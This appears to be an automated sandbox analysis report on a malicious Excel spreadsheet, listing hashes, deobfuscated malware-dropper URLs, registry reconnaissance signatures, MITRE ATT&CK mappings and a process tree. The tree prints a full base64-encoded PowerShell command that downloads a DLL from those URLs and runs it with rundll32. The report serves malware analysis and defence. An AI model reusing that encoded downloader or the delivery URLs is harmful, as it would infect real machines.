89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35

General

Target

89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35.xls
Size

151KB
MD5

57ae9a272db8afd8070654e33aad712e
SHA1

7d843ebfbc5f3c39fae771282397fb32167ec1c1
SHA256

89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35
SHA512

17446c77f0fc0058a7b947c4460c362bccccc9262a9543a9680bc6c8ff83219319656853665e33a7b295e91908b31159bc7b9351271896791f0cc2d18815c6dd
SSDEEP

3072:hcKoSsxzNDZLDZjlbR868O8KlVH3dehvMqAPjxO5xyZUE5V5xtezEVg8/dg1Gx0n:hcKoSsxzNDZLDZjlbR868O8KlVH3dehD

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://aishyana.com/wp-admin/6pY001tdOxYb10/

exe.dropper

https://nccikeja.com/back/lOo46UEiVanm/

exe.dropper

https://mail.themintlist.com/wp-includes/S5xbjWOoM75ysw9xaM/

exe.dropper

https://karaah.com/kvxtqec/L8mqXiKjN95uoFOQqDS/

exe.dropper

https://mail.terinhumphrey.com/tasty-crab-promo/qBdohcsqomjFk/

exe.dropper

https://mail.gymcoachjose.com/ew9iwl/av20pfJZ44/

exe.dropper

https://sahayoghospitals.com/older/NFPLtNt4M3D1yYt/

exe.dropper

http://3.130.37.158/wp-admin/YDjVQgZv/

exe.dropper

https://stntools.com/js/uhTyC/

exe.dropper

https://www.dirtduel.com/db/v4gdL66Y/

exe.dropper

https://advancedguerrillamarketing.com/assets/oUD/

exe.dropper

https://orelco.net/wp-admin/5NiO/

exe.dropper

http://gainc.info/product3_files/PwAGXtbf6tn5r/

exe.dropper

https://astronomy24x7.com/wp-content/05ZGtxtrfIxNVb0M/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4240	2420	wscript.exe	82

Blocklisted process makes network request 11 IoCs

flow	pid	Process
28	2412	powershell.exe
43	2412	powershell.exe
47	2412	powershell.exe
60	2412	powershell.exe
62	2412	powershell.exe
65	2412	powershell.exe
70	2412	powershell.exe
72	2412	powershell.exe
74	2412	powershell.exe
78	2412	powershell.exe
80	2412	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2420	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2412	powershell.exe
2412	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2420	EXCEL.EXE
2420	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE
2420	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2420 wrote to memory of 4240	2420	EXCEL.EXE	88
PID 2420 wrote to memory of 4240	2420	EXCEL.EXE	88
PID 4240 wrote to memory of 60	4240	wscript.exe	89
PID 4240 wrote to memory of 60	4240	wscript.exe	89
PID 60 wrote to memory of 2412	60	cmd.exe	91
PID 60 wrote to memory of 2412	60	cmd.exe	91

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Windows\SYSTEM32\wscript.exe
  wscript c:\programdata\wetidjks.vbs
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:60
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBhAGkAcwBoAHkAYQBuAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADYAcABZADAAMAAxAHQAZABPAHgAWQBiADEAMAAvACwAaAB0AHQAcABzADoALwAvAG4AYwBjAGkAawBlAGoAYQAuAGMAbwBtAC8AYgBhAGMAawAvAGwATwBvADQANgBVAEUAaQBWAGEAbgBtAC8ALABoAHQAdABwAHMAOgAvAC8AbQBhAGkAbAAuAHQAaABlAG0AaQBuAHQAbABpAHMAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AUwA1AHgAYgBqAFcATwBvAE0ANwA1AHkAcwB3ADkAeABhAE0ALwAsAGgAdAB0AHAAcwA6AC8ALwBrAGEAcgBhAGEAaAAuAGMAbwBtAC8AawB2AHgAdABxAGUAYwAvAEwAOABtAHEAWABpAEsAagBOADkANQB1AG8ARgBPAFEAcQBEAFMALwAsAGgAdAB0AHAAcwA6AC8ALwBtAGEAaQBsAC4AdABlAHIAaQBuAGgAdQBtAHAAaAByAGUAeQAuAGMAbwBtAC8AdABhAHMAdAB5AC0AYwByAGEAYgAtAHAAcgBvAG0AbwAvAHEAQgBkAG8AaABjAHMAcQBvAG0AagBGAGsALwAsAGgAdAB0AHAAcwA6AC8ALwBtAGEAaQBsAC4AZwB5AG0AYwBvAGEAYwBoAGoAbwBzAGUALgBjAG8AbQAvAGUAdwA5AGkAdwBsAC8AYQB2ADIAMABwAGYASgBaADQANAAvACwAaAB0AHQAcABzADoALwAvAHMAYQBoAGEAeQBvAGcAaABvAHMAcABpAHQAYQBsAHMALgBjAG8AbQAvAG8AbABkAGUAcgAvAE4ARgBQAEwAdABOAHQANABNADMARAAxAHkAWQB0AC8ALABoAHQAdABwADoALwAvADMALgAxADMAMAAuADMANwAuADEANQA4AC8AdwBwAC0AYQBkAG0AaQBuAC8AWQBEAGoAVgBRAGcAWgB2AC8ALABoAHQAdABwAHMAOgAvAC8AcwB0AG4AdABvAG8AbABzAC4AYwBvAG0ALwBqAHMALwB1AGgAVAB5AEMALwAsAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGQAaQByAHQAZAB1AGUAbAAuAGMAbwBtAC8AZABiAC8AdgA0AGcAZABMADYANgBZAC8ALABoAHQAdABwAHMAOgAvAC8AYQBkAHYAYQBuAGMAZQBkAGcAdQBlAHIAcgBpAGwAbABhAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwBhAHMAcwBlAHQAcwAvAG8AVQBEAC8ALABoAHQAdABwAHMAOgAvAC8AbwByAGUAbABjAG8ALgBuAGUAdAAvAHcAcAAtAGEAZABtAGkAbgAvADUATgBpAE8ALwAsAGgAdAB0AHAAOgAvAC8AZwBhAGkAbgBjAC4AaQBuAGYAbwAvAHAAcgBvAGQAdQBjAHQAMwBfAGYAaQBsAGUAcwAvAFAAdwBBAEcAWAB0AGIAZgA2AHQAbgA1AHIALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHMAdAByAG8AbgBvAG0AeQAyADQAeAA3AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA1AFoARwB0AHgAdAByAGYASQB4AE4AVgBiADAATQAvACIALgBTAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJABHAGQAcgBoAGsANAApAHsAJABoAGIAcgBrAGUAMgA9ACIAdgBiAGsAdwBrACIAOwAkAEcAcwBSAEUAdwB0ADQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABoAGQARwBlADUANQByAHUAcgA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAIgArACQAaABiAHIAawBlADIAKwAiAC4AZABsAGwAIgA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAaABkAEcAZQA1ADUAcgB1AHIAOwBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAaABkAEcAZQA1ADUAcgB1AHIAKQB7AGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAJABoAGQARwBlADUANQByAHUAcgApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAIgArACIAbgBkAG8AdwBzAFwAcwB5AHMAdwBvACIAKwAiAHcANgA0AFwAcgB1AG4AZABsACIAKwAiAGwAMwAyAC4AZQB4AGUAIgA7ACQAYgBuAFoAUgA2ADUAZAA9ACQAaABkAEcAZQA1ADUAcgB1AHIAKwAiACwAZgAiACsAJABHAHMAUgBFAHcAdAA0ADsAYgByAGUAYQBrADsAfQB9AH0A
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rrnpzos0.ihf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
fd27029f698761e26b7cd39fb9d79f24

SHA1
3ea2eb1dd7abd845dbd474d41e7d40fd19d189cc

SHA256
bf9dc83d8ccb0dcf59a20f0bd94bac60b7e0bc0fa97b97349018a593cc86136e

SHA512
9db5800ee88ae89d24fd011101790eb006cb3d24acdd404a8dc2097ea0e61fff4f375eea986b43b1e6b89c6c38e31e83a2b39634c67c277ec72e9010c8ba262c

Download Submit
C:\programdata\jledshf.bat

Filesize
3KB

MD5
d8220bb8385825eff7fe5e22bf2eb885

SHA1
cf3028eb0ba914cdb699b13c3d7ef54e764c5f83

SHA256
6c2eb6914bd455d15ba66d2e108ebfbc9f67c6d4d7e4ef6df1ff624946761927

SHA512
4f2c32fae7d618b12cb827130df0efe2842de0ed34a68c74db576d19b17c6ac939150aea421f8867238688b8280ca7231e870d5144320bd7a839c67a6370ea1f

Download Submit
\??\c:\programdata\wetidjks.vbs

Filesize
331B

MD5
3b1981c56995aa93dfac052238402b1a

SHA1
36676ee9ff2096b8c9d6179ea3db2d1a93c6cb04

SHA256
fca2b52421d1f71dd2e058f604346b853f621c5625e5a42006583bf8115797f1

SHA512
f82962b1faaa93749684b2f8d77e02133b5a8ac64d984effd341324afd034adb8c69af1d812a69df10fd2fa924885c30e590365d23281bef5bbfa52f39e31a8a

Download Submit
memory/2412-104-0x0000026C6D790000-0x0000026C6DF36000-memory.dmp

Filesize
7.6MB

Download
memory/2412-85-0x0000026C6CAF0000-0x0000026C6CB12000-memory.dmp

Filesize
136KB

Download
memory/2420-10-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-19-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-0-0x00007FF9D9870000-0x00007FF9D9880000-memory.dmp

Filesize
64KB

Download
memory/2420-11-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-12-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-13-0x00007FF9D76C0000-0x00007FF9D76D0000-memory.dmp

Filesize
64KB

Download
memory/2420-8-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-14-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-16-0x00007FF9D76C0000-0x00007FF9D76D0000-memory.dmp

Filesize
64KB

Download
memory/2420-15-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-17-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-18-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-7-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-9-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-33-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-34-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-54-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-2-0x00007FF9D9870000-0x00007FF9D9880000-memory.dmp

Filesize
64KB

Download
memory/2420-3-0x00007FF9D9870000-0x00007FF9D9880000-memory.dmp

Filesize
64KB

Download
memory/2420-5-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-6-0x00007FF9D9870000-0x00007FF9D9880000-memory.dmp

Filesize
64KB

Download
memory/2420-90-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-92-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-91-0x00007FFA1988D000-0x00007FFA1988E000-memory.dmp

Filesize
4KB

Download
memory/2420-96-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-97-0x00007FFA197F0000-0x00007FFA199E5000-memory.dmp

Filesize
2.0MB

Download
memory/2420-4-0x00007FF9D9870000-0x00007FF9D9880000-memory.dmp

Filesize
64KB

Download
memory/2420-1-0x00007FFA1988D000-0x00007FFA1988E000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads